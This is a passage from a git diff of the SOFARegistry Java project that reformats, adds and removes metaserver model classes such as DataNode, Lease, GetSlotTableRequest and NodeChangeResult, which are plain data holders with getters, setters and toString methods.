StringBuilder sb = new StringBuilder("DataCenterNodes{"); - sb.append("nodeType=").append(nodeType); - sb.append(", version=").append(version); - sb.append(", dataCenterId='").append(dataCenterId).append('\''); - sb.append(", nodes=").append(nodes); - sb.append('}'); - return sb.toString(); - } - -} \ No newline at end of file + private final NodeType nodeType; + + private final long version; + + private final String dataCenterId; + + private Map nodes; + + /** + * constructor + * + * @param nodeType + * @param version + * @param dataCenterId + */ + public DataCenterNodes(NodeType nodeType, long version, String dataCenterId) { + this.nodeType = nodeType; + this.version = version; + this.dataCenterId = dataCenterId; + } + + /** + * Getter method for property version. + * + * @return property value of version + */ + public long getVersion() { + return version; + } + + /** + * Getter method for property dataCenterId. + * + * @return property value of dataCenterId + */ + public String getDataCenterId() { + return dataCenterId; + } + + /** + * Getter method for property nodes. + * + * @return property value of nodes + */ + public Map getNodes() { + return nodes; + } + + /** + * Setter method for property nodes. + * + * @param nodes value to be assigned to property nodes + */ + public void setNodes(Map nodes) { + this.nodes = nodes; + } + + @Override + public String toString() { + final StringBuilder sb = new StringBuilder("DataCenterNodes{"); + sb.append("nodeType=").append(nodeType); + sb.append(", version=").append(version); + sb.append(", dataCenterId='").append(dataCenterId).append('\''); + sb.append(", nodes=").append(nodes); + sb.append('}'); + return sb.toString(); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/DataNode.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/DataNode.java deleted file mode 100644 index ca3bba378..000000000 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/DataNode.java +++ /dev/null @@ -1,224 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.common.model.metaserver; - -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.consistency.hash.HashNode; - -/** - * - * @author shangyu.wh - * @version $Id: DataNode.java, v 0.1 2018-01-18 18:06 shangyu.wh Exp $ - */ -public class DataNode implements Node, HashNode { - - private final URL nodeUrl; - - private final String nodeName; - - private final String dataCenter; - - private String regionId; - - private NodeStatus nodeStatus; - - private long registrationTimestamp; - - /** - * constructor - * @param nodeUrl - * @param dataCenter - */ - public DataNode(URL nodeUrl, String dataCenter) { - this.nodeUrl = nodeUrl; - this.nodeName = nodeUrl.getIpAddress(); - this.dataCenter = dataCenter; - this.nodeStatus = NodeStatus.INIT; - } - - /** - * constructor - * @param nodeUrl - * @param dataCenter - * @param status - */ - public DataNode(URL nodeUrl, String dataCenter, NodeStatus status) { - this(nodeUrl, dataCenter); - this.nodeStatus = status; - } - - @Override - public boolean equals(Object o) { - if (this == o) { - return true; - } - if (!(o instanceof DataNode)) { - return false; - } - - DataNode that = (DataNode) o; - - if (nodeStatus != null ? !nodeStatus.equals(that.nodeStatus) : that.nodeStatus != null) { - return false; - } - if (nodeName != null ? !nodeName.equals(that.nodeName) : that.nodeName != null) { - return false; - } - - if (dataCenter != null ? !dataCenter.equals(that.dataCenter) : that.dataCenter != null) { - return false; - } - - if (regionId != null ? !regionId.equals(that.regionId) : that.regionId != null) { - return false; - } - - if (registrationTimestamp != that.registrationTimestamp) { - return false; - } - - return nodeUrl != null ? (nodeUrl.getAddressString() != null ? nodeUrl.getAddressString() - .equals(that.nodeUrl.getAddressString()) : that.nodeUrl.getAddressString() != null) - : that.nodeUrl != null; - } - - /** - * Hash code int. - * - * @return the int - */ - @Override - public int hashCode() { - int result = nodeName != null ? nodeName.hashCode() : 0; - result = 31 * result + (dataCenter != null ? dataCenter.hashCode() : 0); - result = 31 * result + (regionId != null ? regionId.hashCode() : 0); - result = 31 * result + (nodeStatus != null ? nodeStatus.hashCode() : 0); - result = 31 * result + (int) (registrationTimestamp ^ (registrationTimestamp >>> 32)); - result = 31 - * result - + (nodeUrl != null ? (nodeUrl.getAddressString() != null ? nodeUrl - .getAddressString().hashCode() : 0) : 0); - return result; - } - - @Override - public NodeType getNodeType() { - return NodeType.DATA; - } - - @Override - public URL getNodeUrl() { - return nodeUrl; - } - - /** - * get ip address for nodeUrl - * @return - */ - public String getIp() { - return nodeUrl == null ? "" : nodeUrl.getIpAddress(); - } - - /** - * Getter method for property nodeName. - * - * @return property value of nodeName - */ - @Override - public String getNodeName() { - return nodeName; - } - - /** - * Getter method for property regionId. - * - * @return property value of regionId - */ - public String getRegionId() { - return regionId; - } - - /** - * Setter method for property regionId. - * - * @param regionId value to be assigned to property regionId - */ - public void setRegionId(String regionId) { - this.regionId = regionId; - } - - /** - * Getter method for property dataCenter. - * - * @return property value of dataCenter - */ - public String getDataCenter() { - return dataCenter; - } - - /** - * Getter method for property nodeStatus. - * - * @return property value of nodeStatus - */ - @Override - public NodeStatus getNodeStatus() { - return nodeStatus; - } - - /** - * Setter method for property nodeStatus. - * - * @param nodeStatus value to be assigned to property nodeStatus - */ - @Override - public void setNodeStatus(NodeStatus nodeStatus) { - this.nodeStatus = nodeStatus; - } - - /** - * Getter method for property registrationTimestamp. - * - * @return property value of registrationTimestamp - */ - public long getRegistrationTimestamp() { - return registrationTimestamp; - } - - /** - * Setter method for property registrationTimestamp. - * - * @param registrationTimestamp value to be assigned to property registrationTimestamp - */ - public void setRegistrationTimestamp(long registrationTimestamp) { - this.registrationTimestamp = registrationTimestamp; - } - - @Override - public String toString() { - final StringBuilder sb = new StringBuilder("DataNode{"); - sb.append("ip=").append(getIp()); - sb.append(", dataCenter='").append(dataCenter).append('\''); - sb.append(", regionId='").append(regionId).append('\''); - sb.append(", nodeStatus=").append(nodeStatus); - sb.append(", registrationTimestamp=").append(registrationTimestamp); - sb.append('}'); - return sb.toString(); - } - -} \ No newline at end of file diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/DataOperation.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/DataOperation.java new file mode 100644 index 000000000..62d689299 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/DataOperation.java @@ -0,0 +1,28 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.metaserver; + +/** + * @author shangyu.wh + * @version $Id: DataOperator.java, v 0.1 2018-04-17 21:03 shangyu.wh Exp $ + */ +public enum DataOperation { + ADD, + REMOVE, + UPDATE, + QUERY +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/DataOperator.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/DataOperator.java deleted file mode 100644 index e8b984932..000000000 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/DataOperator.java +++ /dev/null @@ -1,26 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.common.model.metaserver; - -/** - * - * @author shangyu.wh - * @version $Id: DataOperator.java, v 0.1 2018-04-17 21:03 shangyu.wh Exp $ - */ -public enum DataOperator { - ADD, REMOVE, UPDATE, QUERY -} \ No newline at end of file diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/FetchProvideDataRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/FetchProvideDataRequest.java index 86de06583..9d2ce9011 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/FetchProvideDataRequest.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/FetchProvideDataRequest.java @@ -19,36 +19,36 @@ import java.io.Serializable; /** - * * @author shangyu.wh * @version $Id: FetchProvideDataRequest.java, v 0.1 2018-04-17 21:19 shangyu.wh Exp $ */ public class FetchProvideDataRequest implements Serializable { - private final String dataInfoId; + private final String dataInfoId; - /** - * construtor - * @param dataInfoId - */ - public FetchProvideDataRequest(String dataInfoId) { - this.dataInfoId = dataInfoId; - } + /** + * construtor + * + * @param dataInfoId + */ + public FetchProvideDataRequest(String dataInfoId) { + this.dataInfoId = dataInfoId; + } - /** - * Getter method for property dataInfoId. - * - * @return property value of dataInfoId - */ - public String getDataInfoId() { - return dataInfoId; - } + /** + * Getter method for property dataInfoId. + * + * @return property value of dataInfoId + */ + public String getDataInfoId() { + return dataInfoId; + } - @Override - public String toString() { - final StringBuilder sb = new StringBuilder("FetchProvideDataRequest{"); - sb.append("dataInfoId='").append(dataInfoId).append('\''); - sb.append('}'); - return sb.toString(); - } -} \ No newline at end of file + @Override + public String toString() { + final StringBuilder sb = new StringBuilder("FetchProvideDataRequest{"); + sb.append("dataInfoId='").append(dataInfoId).append('\''); + sb.append('}'); + return sb.toString(); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/GetChangeListRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/GetChangeListRequest.java deleted file mode 100644 index 298ab73cc..000000000 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/GetChangeListRequest.java +++ /dev/null @@ -1,82 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.common.model.metaserver; - -import com.alipay.sofa.registry.common.model.Node.NodeType; - -import java.io.Serializable; - -/** - * - * @author shangyu.wh - * @version $Id: GetChangeListRequest.java, v 0.1 2018-02-12 11:02 shangyu.wh Exp $ - */ -public class GetChangeListRequest implements Serializable { - - private final NodeType nodeType; - - /** - * get list data dataCenter - */ - private String dataCenterId; - - /** - * constructor - * @param nodeType - * @param dataCenterId - */ - public GetChangeListRequest(NodeType nodeType, String dataCenterId) { - this.nodeType = nodeType; - this.dataCenterId = dataCenterId; - } - - /** - * Getter method for property dataCenterId. - * - * @return property value of dataCenterId - */ - public String getDataCenterId() { - return dataCenterId; - } - - /** - * Setter method for property dataCenterId. - * - * @param dataCenterId value to be assigned to property dataCenterId - */ - public void setDataCenterId(String dataCenterId) { - this.dataCenterId = dataCenterId; - } - - /** - * Getter method for property nodeType. - * - * @return property value of nodeType - */ - public NodeType getNodeType() { - return nodeType; - } - - @Override - public String toString() { - final StringBuilder sb = new StringBuilder("GetChangeListRequest{"); - sb.append("nodeType=").append(nodeType); - sb.append(", dataCenterId='").append(dataCenterId).append('\''); - sb.append('}'); - return sb.toString(); - } -} \ No newline at end of file diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/GetNodesRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/GetNodesRequest.java deleted file mode 100644 index e802e06e4..000000000 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/GetNodesRequest.java +++ /dev/null @@ -1,56 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.common.model.metaserver; - -import com.alipay.sofa.registry.common.model.Node.NodeType; - -import java.io.Serializable; - -/** - * - * @author shangyu.wh - * @version $Id: GetNodesRequest.java, v 0.1 2018-03-02 15:07 shangyu.wh Exp $ - */ -public class GetNodesRequest implements Serializable { - - private final NodeType nodeType; - - /** - * constructor - * @param nodeType - */ - public GetNodesRequest(NodeType nodeType) { - this.nodeType = nodeType; - } - - /** - * Getter method for property nodeType. - * - * @return property value of nodeType - */ - public NodeType getNodeType() { - return nodeType; - } - - @Override - public String toString() { - final StringBuilder sb = new StringBuilder("GetNodesRequest{"); - sb.append("nodeType=").append(nodeType); - sb.append('}'); - return sb.toString(); - } -} \ No newline at end of file diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/GetSlotTableRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/GetSlotTableRequest.java new file mode 100644 index 000000000..5ea36e9ca --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/GetSlotTableRequest.java @@ -0,0 +1,73 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.metaserver; + +import java.io.Serializable; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-11 11:16 yuzhi.lyz Exp $ + */ +public class GetSlotTableRequest implements Serializable { + private static final long serialVersionUID = 2478663577413212315L; + private final long epochOfNode; + // session node not care the followers + private final boolean ignoredFollowers; + // data node only care self, if not set, get all + private final String targetDataNode; + + public GetSlotTableRequest(long epochOfNode, String targetDataNode, boolean ignoredFollowers) { + this.epochOfNode = epochOfNode; + this.targetDataNode = targetDataNode; + this.ignoredFollowers = ignoredFollowers; + } + + /** + * Getter method for property epochOfNode. + * + * @return property value of epochOfNode + */ + public long getEpochOfNode() { + return epochOfNode; + } + + /** + * Getter method for property targetDataNode. + * + * @return property value of targetDataNode + */ + public String getTargetDataNode() { + return targetDataNode; + } + + public boolean isIgnoredFollowers() { + return ignoredFollowers; + } + + @Override + public String toString() { + return "GetSlotTableRequest{" + + "epochOfNode=" + + epochOfNode + + ", ignoredFollowers=" + + ignoredFollowers + + ", targetDataNode='" + + targetDataNode + + '\'' + + '}'; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/GetSlotTableResult.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/GetSlotTableResult.java new file mode 100644 index 000000000..bd6b89a83 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/GetSlotTableResult.java @@ -0,0 +1,57 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.metaserver; + +import com.alipay.sofa.registry.common.model.slot.DataNodeSlot; +import java.util.List; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-11 13:48 yuzhi.lyz Exp $ + */ +public class GetSlotTableResult { + private final long epoch; + private final List slots; + + public GetSlotTableResult(long epoch, List slots) { + this.epoch = epoch; + this.slots = slots; + } + + /** + * Getter method for property epoch. + * + * @return property value of epoch + */ + public long getEpoch() { + return epoch; + } + + /** + * Getter method for property slots. + * + * @return property value of slots + */ + public List getSlots() { + return slots; + } + + @Override + public String toString() { + return "GetSlotTableResult{" + "epoch=" + epoch + ", slots=" + slots + '}'; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/Lease.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/Lease.java new file mode 100644 index 000000000..93b73ad9a --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/Lease.java @@ -0,0 +1,168 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.metaserver; + +import java.io.Serializable; +import java.util.Objects; +import java.util.concurrent.TimeUnit; + +/** + * heartbeat info for node + * + * @author shangyu.wh + * @version $Id: Renewer.java, v 0.1 2018-01-16 17:10 shangyu.wh Exp $ + */ +public class Lease implements Serializable { + + public static final String LEASE_DURATION = "registry.lease.duration.secs"; + public static final int DEFAULT_DURATION_SECS = Integer.getInteger(LEASE_DURATION, 30); + + private T renewal; + + private long beginTimestamp; + + private volatile long lastUpdateTimestamp; + + private long duration; + + /** + * constructor + * + * @param renewal + * @param durationSECS + */ + public Lease(T renewal, long durationSECS) { + this.renewal = renewal; + this.beginTimestamp = System.currentTimeMillis(); + this.lastUpdateTimestamp = beginTimestamp; + this.duration = durationSECS * 1000; + } + + /** + * Constructor. + * + * @param renewal the renewal + * @param duration the duration + * @param unit the unit + */ + public Lease(T renewal, long duration, TimeUnit unit) { + this(renewal, unit.toSeconds(duration)); + } + + /** + * verify expired or not + * + * @return + */ + public boolean isExpired() { + return System.currentTimeMillis() > lastUpdateTimestamp + duration; + } + + /** refresh lastUpdateTimestamp */ + public void renew() { + lastUpdateTimestamp = System.currentTimeMillis(); + } + + /** + * refresh lastUpdateTimestamp by durationSECS + * + * @param durationSECS + */ + public void renew(long durationSECS) { + lastUpdateTimestamp = System.currentTimeMillis(); + duration = durationSECS * 1000; + } + + /** + * Getter method for property renewal. + * + * @return property value of renewal + */ + public T getRenewal() { + return renewal; + } + + /** + * Setter method for property renewal. + * + * @param renewal value to be assigned to property renewal + */ + public void setRenewal(T renewal) { + this.renewal = renewal; + } + + /** + * Getter method for property beginTimestamp. + * + * @return property value of beginTimestamp + */ + public long getBeginTimestamp() { + return beginTimestamp; + } + + /** + * Getter method for property lastUpdateTimestamp. + * + * @return property value of lastUpdateTimestamp + */ + public long getLastUpdateTimestamp() { + return lastUpdateTimestamp; + } + + /** + * To string string. + * + * @return the string + */ + @Override + public String toString() { + return "Lease{" + + "renewal=" + + renewal + + ", beginTimestamp=" + + beginTimestamp + + ", lastUpdateTimestamp=" + + lastUpdateTimestamp + + ", duration=" + + duration + + '}'; + } + + /** + * Equals boolean. + * + * @param o the o + * @return the boolean + */ + @Override + public boolean equals(Object o) { + if (this == o) return true; + if (o == null || getClass() != o.getClass()) return false; + Lease lease = (Lease) o; + return beginTimestamp == lease.beginTimestamp && renewal.equals(lease.renewal); + } + + /** + * Hash code int. + * + * @return the int + */ + @Override + public int hashCode() { + return Objects.hash(renewal, beginTimestamp); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/MetaNode.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/MetaNode.java deleted file mode 100644 index 6adf2457c..000000000 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/MetaNode.java +++ /dev/null @@ -1,141 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.common.model.metaserver; - -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.store.URL; - -/** - * - * @author shangyu.wh - * @version $Id: MetaNode.java, v 0.1 2018-03-02 16:42 shangyu.wh Exp $ - */ -public class MetaNode implements Node { - - private final NodeType nodeType = NodeType.META; - - private final URL nodeUrl; - - private final String dataCenter; - - private String name; - - private String regionId; - - private NodeStatus nodeStatus; - - /** - * constructor - * @param nodeUrl - * @param dataCenter - */ - public MetaNode(URL nodeUrl, String dataCenter) { - this.nodeUrl = nodeUrl; - this.name = getIp(); - this.dataCenter = dataCenter; - this.nodeStatus = NodeStatus.INIT; - } - - @Override - public NodeType getNodeType() { - return nodeType; - } - - @Override - public NodeStatus getNodeStatus() { - return nodeStatus; - } - - @Override - public URL getNodeUrl() { - return nodeUrl; - } - - /** - * Getter method for property dataCenter. - * - * @return property value of dataCenter - */ - public String getDataCenter() { - return dataCenter; - } - - /** - * get ip address from nodeUrl - * @return - */ - public String getIp() { - return nodeUrl == null ? "" : nodeUrl.getIpAddress(); - } - - /** - * Setter method for property nodeStatus. - * - * @param nodeStatus value to be assigned to property nodeStatus - */ - @Override - public void setNodeStatus(NodeStatus nodeStatus) { - this.nodeStatus = nodeStatus; - } - - /** - * Getter method for property name. - * - * @return property value of name - */ - public String getName() { - return name; - } - - /** - * Setter method for property name. - * - * @param name value to be assigned to property name - */ - public void setName(String name) { - this.name = name; - } - - /** - * Getter method for property regionId. - * - * @return property value of regionId - */ - public String getRegionId() { - return regionId; - } - - /** - * Setter method for property regionId. - * - * @param regionId value to be assigned to property regionId - */ - public void setRegionId(String regionId) { - this.regionId = regionId; - } - - @Override - public String toString() { - final StringBuilder sb = new StringBuilder("MetaNode{"); - sb.append("nodeUrl=").append(getIp()); - sb.append(", dataCenter='").append(dataCenter).append('\''); - sb.append(", regionId='").append(regionId).append('\''); - sb.append(", nodeStatus=").append(nodeStatus); - sb.append('}'); - return sb.toString(); - } -} \ No newline at end of file diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/NodeChangeResult.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/NodeChangeResult.java index dd9e9c4c2..7dbd2d685 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/NodeChangeResult.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/NodeChangeResult.java @@ -18,126 +18,125 @@ import com.alipay.sofa.registry.common.model.Node; import com.alipay.sofa.registry.common.model.Node.NodeType; - import java.io.Serializable; import java.util.Map; /** - * * @author shangyu.wh * @version $Id: NodeChangeRequest.java, v 0.1 2018-01-11 16:55 shangyu.wh Exp $ */ public class NodeChangeResult implements Serializable { - private final NodeType nodeType; - - private Map> nodes; - - private Long version; - - private Map dataCenterListVersions; - - /** local dataCenter id */ - private String localDataCenter; - - /** - * constructor - * @param nodeType - */ - public NodeChangeResult(NodeType nodeType) { - this.nodeType = nodeType; - } - - /** - * Getter method for property nodeType. - * - * @return property value of nodeType - */ - public NodeType getNodeType() { - return nodeType; - } - - /** - * Getter method for property nodes. - * - * @return property value of nodes - */ - public Map> getNodes() { - return nodes; - } - - /** - * Setter method for property nodes. - * - * @param nodes value to be assigned to property nodes - */ - public void setNodes(Map> nodes) { - this.nodes = nodes; - } - - /** - * Getter method for property localDataCenter. - * - * @return property value of localDataCenter - */ - public String getLocalDataCenter() { - return localDataCenter; - } - - /** - * Setter method for property localDataCenter. - * - * @param localDataCenter value to be assigned to property localDataCenter - */ - public void setLocalDataCenter(String localDataCenter) { - this.localDataCenter = localDataCenter; - } - - /** - * Getter method for property version. - * - * @return property value of version - */ - public Long getVersion() { - return version; - } - - /** - * Setter method for property version. - * - * @param version value to be assigned to property version - */ - public void setVersion(Long version) { - this.version = version; - } - - /** - * Getter method for property dataCenterListVersions. - * - * @return property value of dataCenterListVersions - */ - public Map getDataCenterListVersions() { - return dataCenterListVersions; - } - - /** - * Setter method for property dataCenterListVersions. - * - * @param dataCenterListVersions value to be assigned to property dataCenterListVersions - */ - public void setDataCenterListVersions(Map dataCenterListVersions) { - this.dataCenterListVersions = dataCenterListVersions; - } - - @Override - public String toString() { - final StringBuilder sb = new StringBuilder("NodeChangeResult{"); - sb.append("nodeType=").append(nodeType); - sb.append(", nodes=").append(nodes); - sb.append(", version=").append(version); - sb.append(", dataCenterListVersions=").append(dataCenterListVersions); - sb.append(", localDataCenter='").append(localDataCenter).append('\''); - sb.append('}'); - return sb.toString(); - } -} \ No newline at end of file + private final NodeType nodeType; + + private Map> nodes; + + private Long version; + + private Map dataCenterListVersions; + + /** local dataCenter id */ + private String localDataCenter; + + /** + * constructor + * + * @param nodeType + */ + public NodeChangeResult(NodeType nodeType) { + this.nodeType = nodeType; + } + + /** + * Getter method for property nodeType. + * + * @return property value of nodeType + */ + public NodeType getNodeType() { + return nodeType; + } + + /** + * Getter method for property nodes. + * + * @return property value of nodes + */ + public Map> getNodes() { + return nodes; + } + + /** + * Setter method for property nodes. + * + * @param nodes value to be assigned to property nodes + */ + public void setNodes(Map> nodes) { + this.nodes = nodes; + } + + /** + * Getter method for property localDataCenter. + * + * @return property value of localDataCenter + */ + public String getLocalDataCenter() { + return localDataCenter; + } + + /** + * Setter method for property localDataCenter. + * + * @param localDataCenter value to be assigned to property localDataCenter + */ + public void setLocalDataCenter(String localDataCenter) { + this.localDataCenter = localDataCenter; + } + + /** + * Getter method for property version. + * + * @return property value of version + */ + public Long getVersion() { + return version; + } + + /** + * Setter method for property version. + * + * @param version value to be assigned to property version + */ + public void setVersion(Long version) { + this.version = version; + } + + /** + * Getter method for property dataCenterListVersions. + * + * @return property value of dataCenterListVersions + */ + public Map getDataCenterListVersions() { + return dataCenterListVersions; + } + + /** + * Setter method for property dataCenterListVersions. + * + * @param dataCenterListVersions value to be assigned to property dataCenterListVersions + */ + public void setDataCenterListVersions(Map dataCenterListVersions) { + this.dataCenterListVersions = dataCenterListVersions; + } + + @Override + public String toString() { + final StringBuilder sb = new StringBuilder("NodeChangeResult{"); + sb.append("nodeType=").append(nodeType); + sb.append(", nodes=").append(nodes); + sb.append(", version=").append(version); + sb.append(", dataCenterListVersions=").append(dataCenterListVersions); + sb.append(", localDataCenter='").append(localDataCenter).append('\''); + sb.append('}'); + return sb.toString(); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/NotifyProvideDataChange.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/NotifyProvideDataChange.java deleted file mode 100644 index ad14df8f0..000000000 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/NotifyProvideDataChange.java +++ /dev/null @@ -1,109 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.common.model.metaserver; - -import java.io.Serializable; - -/** - * - * @author shangyu.wh - * @version $Id: NotifyProvideDataChange.java, v 0.1 2018-04-18 15:18 shangyu.wh Exp $ - */ -public class NotifyProvideDataChange implements Serializable { - - private String dataInfoId; - - private Long version; - - private DataOperator dataOperator; - - /** - * constructor - * @param dataInfoId - * @param version - * @param dataOperator - */ - public NotifyProvideDataChange(String dataInfoId, Long version, DataOperator dataOperator) { - this.dataInfoId = dataInfoId; - this.version = version; - this.dataOperator = dataOperator; - } - - /** - * Getter method for property dataInfoId. - * - 